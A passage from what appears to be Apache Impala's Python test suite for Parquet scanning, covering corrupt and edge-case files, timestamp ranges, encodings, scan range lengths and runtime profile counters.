self.run_test_case('QueryTest/parquet-abort-on-error', new_vector)
def test_timestamp_out_of_range(self, vector, unique_database):
"""IMPALA-4363: Test scanning parquet files with an out of range timestamp.
Also tests IMPALA-7595: Test Parquet timestamp columns where the time part
is out of the valid range [0..24H).
"""
# out of range date part
create_table_from_parquet(self.client, unique_database, "out_of_range_timestamp")
# out of range time part
create_table_from_parquet(self.client, unique_database, "out_of_range_time_of_day")
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/out-of-range-timestamp-continue-on-error',
vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/out-of-range-timestamp-abort-on-error',
vector, unique_database)
def test_dateless_timestamp_parquet(self, vector, unique_database):
"""Test scanning parquet files which still includes dateless timestamps."""
tbl_name = "timestamp_table"
create_sql = "create table %s.%s (t timestamp) stored as parquet" % (
unique_database, tbl_name)
create_table_and_copy_files(self.client, create_sql, unique_database, tbl_name,
["/testdata/data/dateless_timestamps.parq"])
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/dateless_timestamp_parquet', new_vector,
use_db=unique_database)
def test_date_out_of_range_parquet(self, vector, unique_database):
"""Test scanning parquet files with an out of range date."""
create_table_from_parquet(self.client, unique_database, "out_of_range_date")
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['abort_on_error']
self.run_test_case('QueryTest/out-of-range-date', new_vector, unique_database)
def test_pre_gregorian_date_parquet(self, vector, unique_database):
"""Test date interoperability issues between Impala and Hive 2.1.1 when scanning
a parquet table that contains dates that precede the introduction of Gregorian
calendar in 1582-10-15.
"""
create_table_from_parquet(self.client, unique_database, "hive2_pre_gregorian")
self.run_test_case('QueryTest/hive2-pre-gregorian-date', vector, unique_database)
def test_zero_rows(self, vector, unique_database):
"""IMPALA-3943: Tests that scanning files with num_rows=0 in the file footer
succeeds without errors."""
# Create test table with a file that has 0 rows and 0 row groups.
create_table_from_parquet(self.client, unique_database, "zero_rows_zero_row_groups")
# Create test table with a file that has 0 rows and 1 row group.
create_table_from_parquet(self.client, unique_database, "zero_rows_one_row_group")
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/parquet-zero-rows', vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/parquet-zero-rows', vector, unique_database)
def test_repeated_root_schema(self, vector, unique_database):
"""IMPALA-4826: Tests that running a scan on a schema where the root schema's
repetetion level is set to REPEATED succeeds without errors."""
create_table_from_parquet(self.client, unique_database, "repeated_root_schema")
result = self.client.execute("select * from %s.repeated_root_schema" % unique_database)
assert len(result.data) == 300
def test_huge_num_rows(self, vector, unique_database):
"""IMPALA-5021: Tests that a zero-slot scan on a file with a huge num_rows in the
footer succeeds without errors."""
create_table_from_parquet(self.client, unique_database, "huge_num_rows")
result = self.client.execute("select count(*) from %s.huge_num_rows"
% unique_database)
assert len(result.data) == 1
assert "4294967294" in result.data
@SkipIfABFS.hive
@SkipIfADLS.hive
@SkipIfIsilon.hive
@SkipIfLocal.hive
@SkipIfS3.hive
@SkipIfGCS.hive
def test_multi_compression_types(self, vector, unique_database):
"""IMPALA-5448: Tests that parquet splits with multi compression types are counted
correctly. Cases tested:
- parquet file with columns using the same compression type
- parquet files using snappy and gzip compression types
"""
self.client.execute("create table %s.alltypes_multi_compression like"
" functional_parquet.alltypes" % unique_database)
hql_format = "set parquet.compression={codec};" \
"insert into table %s.alltypes_multi_compression" \
" partition (year = {year}, month = {month})" \
" select id, bool_col, tinyint_col, smallint_col, int_col, bigint_col," \
" float_col, double_col,date_string_col,string_col,timestamp_col" \
" from functional_parquet.alltypes" \
" where year = {year} and month = {month}" % unique_database
self.run_stmt_in_hive(hql_format.format(codec="snappy", year=2010, month=1))
self.run_stmt_in_hive(hql_format.format(codec="gzip", year=2010, month=2))
test_files = ["testdata/multi_compression_parquet_data/tinytable_0_gzip_snappy.parq",
"testdata/multi_compression_parquet_data/tinytable_1_snappy_gzip.parq"]
create_table_and_copy_files(self.client, "create table {db}.{tbl} "
"(a string, b string) stored as parquet",
unique_database, "multi_compression",
test_files)
vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case('QueryTest/hdfs_parquet_scan_node_profile',
vector, unique_database)
def test_corrupt_rle_counts(self, vector, unique_database):
"""IMPALA-3646: Tests that a certain type of file corruption for plain
dictionary encoded values is gracefully handled. Cases tested:
- incorrect literal count of 0 for the RLE encoded dictionary indexes
- incorrect repeat count of 0 for the RLE encoded dictionary indexes
"""
# Create test table and copy the corrupt files into it.
test_files = ["testdata/data/bad_rle_literal_count.parquet",
"testdata/data/bad_rle_repeat_count.parquet"]
create_table_and_copy_files(self.client,
"create table {db}.{tbl} (c bigint) stored as parquet",
unique_database, "bad_rle_counts", test_files)
# Querying the corrupted files should not DCHECK or crash.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/parquet-corrupt-rle-counts', vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/parquet-corrupt-rle-counts-abort',
vector, unique_database)
def corrupt_footer_len_common(self, vector, unique_database, testname_postfix):
"""Common code shared by some tests (such as the ones included in IMPALA-6442 patch).
It creates a simple table then loads manually corrupted Parquet file, and runs
simple query to trigger the printing of related messages. Individual test checks if
the printed messageses are expected.
"""
test_file = "testdata/data/corrupt_footer_len_" + testname_postfix + ".parquet"
test_table = "corrupt_footer_len_" + testname_postfix
test_spec = "QueryTest/parquet-corrupt-footer-len-" + testname_postfix
# Create test table and copy the corrupt files into it.
test_files = [test_file]
create_table_and_copy_files(self.client,
"create table {db}.{tbl} (c bigint) stored as parquet",
unique_database, test_table, test_files)
# Querying the corrupted files should not DCHECK or crash.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case(test_spec, vector, unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case(test_spec, vector, unique_database)
def test_corrupt_footer_len_decr(self, vector, unique_database):
"""IMPALA-6442: Misleading file offset reporting in error messages.
Case tested: decrease the original Parquet footer size by 1, thus metadata
deserialization fails and prints expected error message with correct file offset of
the Parquet file metadata (footer).
"""
self.corrupt_footer_len_common(vector, unique_database, "decr")
def test_corrupt_footer_len_incr(self, vector, unique_database):
"""IMPALA-6442: Misleading file offset reporting in error messages.
Case tested: make the Parquet footer size bigger than the file, thus the footer
can not be loaded and corresponding error message is printed.
"""
self.corrupt_footer_len_common(vector, unique_database, "incr")
def test_bad_compressed_page_size(self, vector, unique_database):
"""IMPALA-6353: Tests that a parquet dict page with 0 compressed_page_size is
gracefully handled. """
create_table_from_parquet(self.client, unique_database,
"bad_compressed_dict_page_size")
self.run_test_case('QueryTest/parquet-bad-compressed-dict-page-size', vector,
unique_database)
def test_def_levels(self, vector, unique_database):
"""Test that Impala behaves as expected when decoding def levels with different
encodings - RLE, BIT_PACKED, etc."""
create_table_from_parquet(self.client, unique_database,
"alltypes_agg_bitpacked_def_levels")
self.run_test_case('QueryTest/parquet-def-levels', vector, unique_database)
def test_bad_compression_codec(self, vector, unique_database):
"""IMPALA-6593: test the bad compression codec is handled gracefully. """
test_files = ["testdata/data/bad_codec.parquet"]
create_table_and_copy_files(self.client, """CREATE TABLE {db}.{tbl} (
id INT, bool_col BOOLEAN, tinyint_col TINYINT, smallint_col SMALLINT,
int_col INT, bigint_col BIGINT, float_col FLOAT, double_col DOUBLE,
date_string_col STRING, string_col STRING, timestamp_col TIMESTAMP,
year INT, month INT) STORED AS PARQUET""",
unique_database, "bad_codec",
test_files)
self.run_test_case('QueryTest/parquet-bad-codec', vector, unique_database)
def test_num_values_def_levels_mismatch(self, vector, unique_database):
"""IMPALA-6589: test the bad num_values handled correctly. """
create_table_from_parquet(self.client, unique_database,
"num_values_def_levels_mismatch")
self.run_test_case('QueryTest/parquet-num-values-def-levels-mismatch',
vector, unique_database)
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_misaligned_parquet_row_groups(self, vector):
"""IMPALA-3989: Test that no warnings are issued when misaligned row groups are
encountered. Make sure that 'NumScannersWithNoReads' counters are set to the number of
scanners that end up doing no reads because of misaligned row groups.
"""
# functional.parquet.alltypes is well-formatted. 'NumScannersWithNoReads' counters are
# set to 0.
table_name = 'functional_parquet.alltypes'
self._misaligned_parquet_row_groups_helper(table_name, 7300)
# lineitem_multiblock_parquet/000000_0 is ill-formatted but every scanner reads some
# row groups. 'NumScannersWithNoReads' counters are set to 0.
table_name = 'functional_parquet.lineitem_multiblock'
self._misaligned_parquet_row_groups_helper(table_name, 20000)
# lineitem_sixblocks.parquet is ill-formatted but every scanner reads some row groups.
# 'NumScannersWithNoReads' counters are set to 0.
table_name = 'functional_parquet.lineitem_sixblocks'
self._misaligned_parquet_row_groups_helper(table_name, 40000)
# Scanning lineitem_one_row_group.parquet finds two scan ranges that end up doing no
# reads because the file is poorly formatted.
table_name = 'functional_parquet.lineitem_multiblock_one_row_group'
self._misaligned_parquet_row_groups_helper(
table_name, 40000, num_scanners_with_no_reads=2)
def _misaligned_parquet_row_groups_helper(
self, table_name, rows_in_table, num_scanners_with_no_reads=0, log_prefix=None):
"""Checks if executing a query logs any warnings and if there are any scanners that
end up doing no reads. 'log_prefix' specifies the prefix of the expected warning.
'num_scanners_with_no_reads' indicates the expected number of scanners that don't read
anything because the underlying file is poorly formatted
"""
query = 'select * from %s' % table_name
result = self.client.execute(query)
assert len(result.data) == rows_in_table
assert (not result.log and not log_prefix) or \
(log_prefix and result.log.startswith(log_prefix))
num_scanners_with_no_reads_list = re.findall(
'NumScannersWithNoReads: ([0-9]*)', result.runtime_profile)
# This will fail if the number of impalads != 3
# The fourth fragment is the "Averaged Fragment"
assert len(num_scanners_with_no_reads_list) == 4
# Calculate the total number of scan ranges that ended up not reading anything because
# an underlying file was poorly formatted.
# Skip the Averaged Fragment; it comes first in the runtime profile.
total = 0
for n in num_scanners_with_no_reads_list[1:]:
total += int(n)
assert total == num_scanners_with_no_reads
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_multiple_blocks_mt_dop(self, vector):
"""Sanity check for MT scan nodes to make sure all blocks from the same file are read.
2 scan ranges per node should be created to read 'lineitem_sixblocks' because
there are 6 blocks and 3 scan nodes. We set mt_dop to 2, so ideally every instance
should read a single range, but since they share a queue its not deterministic and
instead we verify sum of ranges read on a backend is 2."""
query = 'select count(l_orderkey) from functional_parquet.lineitem_sixblocks'
try:
self.client.set_configuration_option('mt_dop', '2')
result = self.client.execute(query)
TOTAL_ROWS = 40000
ranges_complete_list = re.findall(r'ScanRangesComplete: ([0-9]*)',
result.runtime_profile)
num_rows_read_list = re.findall(r'RowsRead: [0-9.K]* \(([0-9]*)\)',
result.runtime_profile)
# The extra fragment is the "Averaged Fragment"
assert len(num_rows_read_list) == 7
assert len(ranges_complete_list) == 7
total_rows_read = 0
# Skip the Averaged Fragment; it comes first in the runtime profile.
for num_row_read in num_rows_read_list[1:]:
total_rows_read += int(num_row_read)
assert total_rows_read == TOTAL_ROWS
# Again skip the Averaged Fragment; it comes first in the runtime profile.
# With mt_dop 2, every backend will have 2 instances which are printed consecutively
# in the profile.
for i in range(1, len(ranges_complete_list), 2):
assert int(ranges_complete_list[i]) + int(ranges_complete_list[i + 1]) == 2
finally:
self.client.clear_configuration()
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_multiple_blocks(self, vector):
# For IMPALA-1881. The table functional_parquet.lineitem_multiblock has 3 blocks, so
# each impalad should read 1 scan range.
table_name = 'functional_parquet.lineitem_multiblock'
self._multiple_blocks_helper(table_name, 20000, ranges_per_node=1)
table_name = 'functional_parquet.lineitem_sixblocks'
# 2 scan ranges per node should be created to read 'lineitem_sixblocks' because
# there are 6 blocks and 3 scan nodes.
self._multiple_blocks_helper(table_name, 40000, ranges_per_node=2)
@SkipIfS3.hdfs_block_size
@SkipIfGCS.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfIsilon.hdfs_block_size
@SkipIfLocal.multiple_impalad
@SkipIfEC.fix_later
def test_multiple_blocks_one_row_group(self, vector):
# For IMPALA-1881. The table functional_parquet.lineitem_multiblock_one_row_group has
# 3 blocks but only one row group across these blocks. We test to see that only one
# scan range reads everything from this row group.
table_name = 'functional_parquet.lineitem_multiblock_one_row_group'
self._multiple_blocks_helper(
table_name, 40000, one_row_group=True, ranges_per_node=1)
def _multiple_blocks_helper(
self, table_name, rows_in_table, one_row_group=False, ranges_per_node=1):
""" This function executes a simple SELECT query on a multiblock parquet table and
verifies the number of ranges issued per node and verifies that at least one row group
was read. If 'one_row_group' is True, then one scan range is expected to read the data
from the entire table regardless of the number of blocks. 'ranges_per_node' indicates
how many scan ranges we expect to be issued per node. """
query = 'select count(l_orderkey) from %s' % table_name
result = self.client.execute(query)
assert len(result.data) == 1
assert result.data[0] == str(rows_in_table)
num_row_groups_list = re.findall('NumRowGroups: ([0-9]*)', result.runtime_profile)
scan_ranges_complete_list = re.findall(
'ScanRangesComplete: ([0-9]*)', result.runtime_profile)
num_rows_read_list = re.findall('RowsRead: [0-9.K]* \(([0-9]*)\)',
result.runtime_profile)
REGEX_UNIT_SECOND = "[0-9]*[s]*[0-9]*[.]*[0-9]*[nm]*[s]*"
REGEX_MIN_MAX_FOOTER_PROCESSING_TIME = \
("FooterProcessingTime: \(Avg: %s ; \(Min: (%s) ; Max: (%s) ; "
"Number of samples: %s\)" % (REGEX_UNIT_SECOND, REGEX_UNIT_SECOND,
REGEX_UNIT_SECOND, "[0-9]*"))
footer_processing_time_list = re.findall(
REGEX_MIN_MAX_FOOTER_PROCESSING_TIME, result.runtime_profile)
# This will fail if the number of impalads != 3
# The fourth fragment is the "Averaged Fragment"
assert len(num_row_groups_list) == 4, result.runtime_profile
assert len(scan_ranges_complete_list) == 4, result.runtime_profile
assert len(num_rows_read_list) == 4, result.runtime_profile
total_num_row_groups = 0
# Skip the Averaged Fragment; it comes first in the runtime profile.
for num_row_groups in num_row_groups_list[1:]:
total_num_row_groups += int(num_row_groups)
if not one_row_group: assert int(num_row_groups) > 0
if one_row_group:
# If it's the one row group test, only one scan range should read all the data from
# that row group.
assert total_num_row_groups == 1
for rows_read in num_rows_read_list[1:]:
if rows_read != '0': assert rows_read == str(rows_in_table)
for scan_ranges_complete in scan_ranges_complete_list:
assert int(scan_ranges_complete) == ranges_per_node
# This checks if the SummaryStatsCounter works correctly. When there is one scan
# range per node, we verify that the FooterProcessingTime counter has the min, max
# and average values as the same since we have only one sample (i.e. only one range)
# TODO: Test this for multiple ranges per node as well. This requires parsing the
# stat times as strings and comparing if min <= avg <= max.
if ranges_per_node == 1:
for min_max_time in footer_processing_time_list:
# Assert that (min == avg == max)
assert min_max_time[0] == min_max_time[1] == min_max_time[2] != 0
def test_annotate_utf8_option(self, vector, unique_database):
if self.exploration_strategy() != 'exhaustive': pytest.skip("Only run in exhaustive")
# Create table
TABLE_NAME = "parquet_annotate_utf8_test"
qualified_table_name = "%s.%s" % (unique_database, TABLE_NAME)
query = 'create table %s (a string, b char(10), c varchar(10), d string) ' \
'stored as parquet' % qualified_table_name
self.client.execute(query)
# Insert data that should have UTF8 annotation
query = 'insert overwrite table %s '\
'values("a", cast("b" as char(10)), cast("c" as varchar(10)), "d")' \
% qualified_table_name
self.execute_query(query, {'parquet_annotate_strings_utf8': True})
def get_schema_elements():
# Copy the created file to the local filesystem and parse metadata
local_file = '/tmp/utf8_test_%s.parq' % random.randint(0, 10000)
LOG.info("test_annotate_utf8_option local file name: " + local_file)
hdfs_file = get_fs_path('/test-warehouse/%s.db/%s/*.parq'
% (unique_database, TABLE_NAME))
check_call(['hadoop', 'fs', '-copyToLocal', hdfs_file, local_file])
metadata = get_parquet_metadata(local_file)
# Extract SchemaElements corresponding to the table columns
a_schema_element = metadata.schema[1]
assert a_schema_element.name == 'a'
b_schema_element = metadata.schema[2]
assert b_schema_element.name == 'b'
c_schema_element = metadata.schema[3]
assert c_schema_element.name == 'c'
d_schema_element = metadata.schema[4]
assert d_schema_element.name == 'd'
os.remove(local_file)
return a_schema_element, b_schema_element, c_schema_element, d_schema_element
# Check that the schema uses the UTF8 annotation
a_schema_elt, b_schema_elt, c_schema_elt, d_schema_elt = get_schema_elements()
assert a_schema_elt.converted_type == ConvertedType.UTF8
assert b_schema_elt.converted_type == ConvertedType.UTF8
assert c_schema_elt.converted_type == ConvertedType.UTF8
assert d_schema_elt.converted_type == ConvertedType.UTF8
# Create table and insert data that should not have UTF8 annotation for strings
self.execute_query(query, {'parquet_annotate_strings_utf8': False})
# Check that the schema does not use the UTF8 annotation except for CHAR and VARCHAR
# columns
a_schema_elt, b_schema_elt, c_schema_elt, d_schema_elt = get_schema_elements()
assert a_schema_elt.converted_type == None
assert b_schema_elt.converted_type == ConvertedType.UTF8
assert c_schema_elt.converted_type == ConvertedType.UTF8
assert d_schema_elt.converted_type == None
def test_resolution_by_name(self, vector, unique_database):
self.run_test_case('QueryTest/parquet-resolution-by-name', vector,
use_db=unique_database)
def test_decimal_encodings(self, vector, unique_database):
# Create a table using an existing data file with dictionary-encoded, variable-length
# physical encodings for decimals.
test_files = ["testdata/data/binary_decimal_dictionary.parquet",
"testdata/data/binary_decimal_no_dictionary.parquet"]
create_table_and_copy_files(self.client, """create table if not exists {db}.{tbl}
(small_dec decimal(9,2), med_dec decimal(18,2), large_dec decimal(38,2))
STORED AS PARQUET""", unique_database, "decimal_encodings", test_files)
create_table_from_parquet(self.client, unique_database, 'decimal_stored_as_int32')
create_table_from_parquet(self.client, unique_database, 'decimal_stored_as_int64')
create_table_from_parquet(self.client, unique_database, 'decimal_padded_fixed_len_byte_array')
create_table_from_parquet(self.client, unique_database, 'decimal_padded_fixed_len_byte_array2')
self.run_test_case('QueryTest/parquet-decimal-formats', vector, unique_database)
def test_rle_encoded_bools(self, vector, unique_database):
"""IMPALA-6324: Test that Impala decodes RLE encoded booleans correctly."""
create_table_from_parquet(self.client, unique_database, "rle_encoded_bool")
self.run_test_case(
'QueryTest/parquet-rle-encoded-bool', vector, unique_database)
def test_dict_encoding_with_large_bit_width(self, vector, unique_database):
"""IMPALA-7147: Test that Impala can decode dictionary encoded pages where the
dictionary index bit width is larger than the encoded byte's bit width.
"""
TABLE_NAME = "dict_encoding_with_large_bit_width"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
result = self.execute_query(
"select * from {0}.{1}".format(unique_database, TABLE_NAME))
assert(len(result.data) == 33)
def test_rle_dictionary_encoding(self, vector, unique_database):
"""IMPALA-6434: Add support to decode RLE_DICTIONARY encoded pages."""
TABLE_NAME = "alltypes_tiny_rle_dictionary"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
self.run_test_case("QueryTest/parquet-rle-dictionary", vector, unique_database)
def test_type_widening(self, vector, unique_database):
"""IMPALA-6373: Test that Impala can read parquet file with column types smaller than
the schema with larger types"""
TABLE_NAME = "primitive_type_widening"
create_table_and_copy_files(self.client, """CREATE TABLE {db}.{tbl} (
a smallint, b int, c bigint, d double, e int, f bigint, g double, h int,
i double, j double) STORED AS PARQUET""", unique_database, TABLE_NAME,
["/testdata/data/{0}.parquet".format(TABLE_NAME)])
self.run_test_case("QueryTest/parquet-type-widening", vector, unique_database)
def test_error_propagation_race(self, vector, unique_database):
"""IMPALA-7662: failed scan signals completion before error is propagated. To
reproduce, we construct a table with two Parquet files, one valid and another
invalid. The scanner thread for the invalid file must propagate the error
before we mark the whole scan complete."""
if vector.get_value('exec_option')['debug_action'] is not None:
pytest.skip(".test file needs to override debug action")
new_vector = deepcopy(vector)
del new_vector.get_value('exec_option')['debug_action']
create_table_and_copy_files(self.client,
"CREATE TABLE {db}.{tbl} (s STRING) STORED AS PARQUET",
unique_database, "bad_magic_number", ["testdata/data/bad_magic_number.parquet"])
# We need the ranges to all be scheduled on the same impalad.
new_vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case("QueryTest/parquet-error-propagation-race", new_vector,
unique_database)
def test_int64_timestamps(self, vector, unique_database):
"""IMPALA-5050: Test that Parquet columns with int64 physical type and
timestamp_millis/timestamp_micros logical type can be read both as
int64 and as timestamp.
"""
# Tiny plain encoded parquet file.
TABLE_NAME = "int64_timestamps_plain"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
TABLE_NAME = "int64_bigints_plain"
CREATE_SQL = """CREATE TABLE {0}.{1} (
new_logical_milli_utc BIGINT,
new_logical_milli_local BIGINT,
new_logical_micro_utc BIGINT,
new_logical_micro_local BIGINT
) STORED AS PARQUET""".format(unique_database, TABLE_NAME)
create_table_and_copy_files(self.client, CREATE_SQL, unique_database, TABLE_NAME,
["/testdata/data/int64_timestamps_plain.parquet"])
# Larger dictionary encoded parquet file.
TABLE_NAME = "int64_timestamps_dict"
CREATE_SQL = """CREATE TABLE {0}.{1} (
id INT,
new_logical_milli_utc TIMESTAMP,
new_logical_milli_local TIMESTAMP,
new_logical_micro_utc TIMESTAMP,
new_logical_micro_local TIMESTAMP
) STORED AS PARQUET""".format(unique_database, TABLE_NAME)
create_table_and_copy_files(self.client, CREATE_SQL, unique_database, TABLE_NAME,
["/testdata/data/{0}.parquet".format(TABLE_NAME)])
TABLE_NAME = "int64_bigints_dict"
CREATE_SQL = """CREATE TABLE {0}.{1} (
id INT,
new_logical_milli_utc BIGINT,
new_logical_milli_local BIGINT,
new_logical_micro_utc BIGINT,
new_logical_micro_local BIGINT
) STORED AS PARQUET""".format(unique_database, TABLE_NAME)
create_table_and_copy_files(self.client, CREATE_SQL, unique_database, TABLE_NAME,
["/testdata/data/int64_timestamps_dict.parquet"])
TABLE_NAME = "int64_timestamps_at_dst_changes"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
TABLE_NAME = "int64_timestamps_nano"
create_table_from_parquet(self.client, unique_database, TABLE_NAME)
self.run_test_case(
'QueryTest/parquet-int64-timestamps', vector, unique_database)
def _is_summary_stats_counter_empty(self, counter):
"""Returns true if the given TSummaryStatCounter is empty, false otherwise"""
return counter.max_value == counter.min_value == counter.sum ==\
counter.total_num_values == 0
def test_page_size_counters(self, vector):
"""IMPALA-6964: Test that the counter Parquet[Un]compressedPageSize is updated
when reading [un]compressed Parquet files, and that the counter
Parquet[Un]compressedPageSize is not updated."""
# lineitem_sixblocks is not compressed so ParquetCompressedPageSize should be empty,
# but ParquetUncompressedPageSize should have been updated. Query needs an order by
# so that all rows are read. Only access a couple of columns to reduce query runtime.
result = self.client.execute("select l_orderkey"
" from functional_parquet.lineitem_sixblocks"
" order by l_orderkey limit 10")
compressed_page_size_summaries = get_bytes_summary_stats_counter(
"ParquetCompressedPageSize", result.runtime_profile)
assert len(compressed_page_size_summaries) > 0
for summary in compressed_page_size_summaries:
assert self._is_summary_stats_counter_empty(summary)
uncompressed_page_size_summaries = get_bytes_summary_stats_counter(
"ParquetUncompressedPageSize", result.runtime_profile)
# validate that some uncompressed data has been read; we don't validate the exact
# amount as the value can change depending on Parquet format optimizations, Impala
# scanner optimizations, etc.
assert len(uncompressed_page_size_summaries) > 0
for summary in uncompressed_page_size_summaries:
assert not self._is_summary_stats_counter_empty(summary)
# alltypestiny is compressed so both ParquetCompressedPageSize and
# ParquetUncompressedPageSize should have been updated
# Query needs an order by so that all rows are read.
result = self.client.execute("select int_col from functional_parquet.alltypestiny"
" order by int_col limit 10")
for summary_name in ("ParquetCompressedPageSize", "ParquetUncompressedPageSize"):
page_size_summaries = get_bytes_summary_stats_counter(
summary_name, result.runtime_profile)
assert len(page_size_summaries) > 0
for summary in page_size_summaries:
assert not self._is_summary_stats_counter_empty(summary)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
def test_bytes_read_per_column(self, vector):
"""IMPALA-6964: Test that the counter Parquet[Un]compressedBytesReadPerColumn is
updated when reading [un]compressed Parquet files, and that the counter
Parquet[Un]CompressedBytesReadPerColumn is not updated."""
# lineitem_sixblocks is not compressed so ParquetCompressedBytesReadPerColumn should
# be empty, but ParquetUncompressedBytesReadPerColumn should have been updated
# Query needs an order by so that all rows are read. Only access a couple of
# columns to reduce query runtime.
result = self.client.execute("select l_orderkey, l_partkey "
"from functional_parquet.lineitem_sixblocks "
" order by l_orderkey limit 10")
compressed_bytes_read_per_col_summaries = get_bytes_summary_stats_counter(
"ParquetCompressedBytesReadPerColumn", result.runtime_profile)
# One aggregated counter and three per-instance counters. Agg counter is first.
assert len(compressed_bytes_read_per_col_summaries) == 4
for summary in compressed_bytes_read_per_col_summaries:
assert self._is_summary_stats_counter_empty(summary)
uncompressed_bytes_read_per_col_summaries = get_bytes_summary_stats_counter(
"ParquetUncompressedBytesReadPerColumn", result.runtime_profile)
# One aggregated counter and three per-instance counters. Agg counter is first.
assert len(uncompressed_bytes_read_per_col_summaries) == 4
for i, summary in enumerate(uncompressed_bytes_read_per_col_summaries):
assert not self._is_summary_stats_counter_empty(summary), summary
# There are 2 columns read from in lineitem_sixblocks so there should be 2 samples
# per instance a 6 total.
if i == 0:
assert summary.total_num_values == 6
else:
assert summary.total_num_values == 2
# alltypestiny is compressed so both ParquetCompressedBytesReadPerColumn and
# ParquetUncompressedBytesReadPerColumn should have been updated
# Query needs an order by so that all rows are read.
result = self.client.execute("select * from functional_parquet.alltypestiny"
" order by int_col limit 10")
for summary_name in ("ParquetCompressedBytesReadPerColumn",
"ParquetUncompressedBytesReadPerColumn"):
bytes_read_per_col_summaries = get_bytes_summary_stats_counter(summary_name,
result.runtime_profile)
# One aggregated counter and three per-instance counters. Agg counter is first.
assert len(bytes_read_per_col_summaries) == 4
for i, summary in enumerate(bytes_read_per_col_summaries):
assert not self._is_summary_stats_counter_empty(summary)
# There are 11 columns in alltypestiny so there should be 11 samples per instance.
if i == 0:
assert summary.total_num_values == 33
else:
assert summary.total_num_values == 11
# We use various scan range lengths to exercise corner cases in the HDFS scanner more
# thoroughly. In particular, it will exercise:
# 1. default scan range
# 2. scan range with no tuple
# 3. tuple that span across multiple scan ranges
# 4. scan range length = 16 for ParseSse() execution path
# 5. scan range fits at least one row
MAX_SCAN_RANGE_LENGTHS = [0, 1, 2, 5, 16, 17, 32, 512]
class TestScanRangeLengths(ImpalaTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('max_scan_range_length', *MAX_SCAN_RANGE_LENGTHS))
# Test doesn't need to be run for non-HDFS table formats.
cls.ImpalaTestMatrix.add_constraint(
lambda v: not v.get_value('table_format').file_format in ('kudu', 'hbase'))
def test_scan_ranges(self, vector):
vector.get_value('exec_option')['max_scan_range_length'] =\
vector.get_value('max_scan_range_length')
self.run_test_case('QueryTest/hdfs-tiny-scan', vector)
# Scan range lengths for TPC-H data sets. Test larger scan range sizes. Random
# variation to the length is added by the test in order to exercise edge cases.
TPCH_SCAN_RANGE_LENGTHS = [128 * 1024, 16 * 1024 * 1024]
class TestTpchScanRangeLengths(ImpalaTestSuite):
"""Exercise different scan range lengths on the larger TPC-H data sets."""
@classmethod
def get_workload(cls):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestTpchScanRangeLengths, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
ImpalaTestDimension('scan_range_length', *TPCH_SCAN_RANGE_LENGTHS))
def test_tpch_scan_ranges(self, vector):
# Randomly adjust the scan range length to exercise different code paths.
max_scan_range_length = \
int(vector.get_value('scan_range_length') * (random.random() + 0.5))
LOG.info("max_scan_range_length={0}".format(max_scan_range_length))
vector.get_value('exec_option')['max_scan_range_length'] = max_scan_range_length
self.run_test_case('tpch-scan-range-lengths', vector)
@SkipIf.not_s3
class TestParquetScanRangeAssigment(ImpalaTestSuite):
"""Test scan range assignment for Parquet files on S3. Since scan range assignment
cannot be validated in the S3PlannerTest (see IMPALA-8942), validate it here."""
@classmethod
def get_workload(cls):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestParquetScanRangeAssigment, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:
v.get_value('table_format').file_format == 'parquet')
def test_scan_range_skew(self, vector):
"""Validate that each scanner reads an even number of row groups (e.g. there is no
skew). While scan ranges might be assigned evenly, scanners skip Parquet scan ranges
that do not process a range that overlaps the Parquet row-group midpoint."""
# Run TPC-H Q6, which re-produces the scan range assignment bug described in
# IMPALA-3453.
result = self.execute_query("select sum(l_extendedprice * l_discount) as revenue "
"from tpch_parquet.lineitem where l_shipdate >= '1994-01-01' and "
"l_shipdate < '1995-01-01' and l_discount between 0.05 and 0.07 and "
"l_quantity < 24")
# NumRowGroups tracks the number of row groups actually read, not necessarily the
# number assigned. Assert that each fragment processed exactly one row group.
self.__assert_counter_equals(r'NumRowGroups: (\d+)', 1, result.runtime_profile)
# ScanRangesComplete tracks the number of scan ranges assigned to each fragment.
# Assert that each fragment was assigned exactly one scan range.
self.__assert_counter_equals(r'ScanRangesComplete: (\d+)', 1, result.runtime_profile)
# NumScannersWithNoReads tracks the number of scan ranges that did not trigger any
